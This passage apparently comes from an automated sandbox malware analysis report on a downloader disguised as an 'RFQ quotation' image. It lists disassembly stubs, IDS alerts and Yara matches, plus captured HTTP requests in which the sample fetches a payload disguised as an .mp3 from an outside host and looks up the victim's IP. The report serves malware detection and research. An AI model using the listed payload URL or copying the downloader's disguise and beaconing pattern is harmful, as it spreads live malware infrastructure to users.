                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C580D2h6_2_05C57D78
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C58A9Ch6_2_05C58892
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C58A9Ch6_2_05C588A0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C5FB60h6_2_05C5FAA0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then jmp 05C5FB60h6_2_05C5FAA8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h6_2_05D1D918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0090F1F6h7_2_0090F007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0090FB80h7_2_0090F007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_0090E528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06001A38h7_2_06001620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060002F1h7_2_06000040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06001471h7_2_060011C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600F8B9h7_2_0600F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06001A38h7_2_06001610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600C8F1h7_2_0600C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600D1A1h7_2_0600CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600DA51h7_2_0600D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600DEA9h7_2_0600DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06000751h7_2_060004A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600E759h7_2_0600E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600B791h7_2_0600B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06001011h7_2_06000D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600F009h7_2_0600ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600C041h7_2_0600BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600FD11h7_2_0600FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600CD49h7_2_0600CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600D5F9h7_2_0600D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600E301h7_2_0600E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06000BB1h7_2_06000900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600EBB1h7_2_0600E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600BBE9h7_2_0600B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06001A38h7_2_06001966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600F461h7_2_0600F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600C499h7_2_0600C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06038945h7_2_06038608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06030741h7_2_06030498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060358C1h7_2_06035618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06035D19h7_2_06035A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06036171h7_2_06035EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060336CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060365C9h7_2_06036320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06036A21h7_2_06036778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060333A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060333B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06036E79h7_2_06036BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060302E9h7_2_06030040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060372FAh7_2_06037050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06037751h7_2_060374A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06030B99h7_2_060308F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06037BA9h7_2_06037900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06030FF1h7_2_06030D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06038001h7_2_06037D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06035441h7_2_06035198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06038459h7_2_060381B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49704
                Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49704
                Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49712
                Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49712
                Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49732
                Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49732
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /panel/Skdqhzzwa.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /panel/Skdqhzzwa.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /panel/Skdqhzzwa.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 67.212.175.162 67.212.175.162
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49729 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49746 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49757 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49755 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49742 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /panel/Skdqhzzwa.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /panel/Skdqhzzwa.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /panel/Skdqhzzwa.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
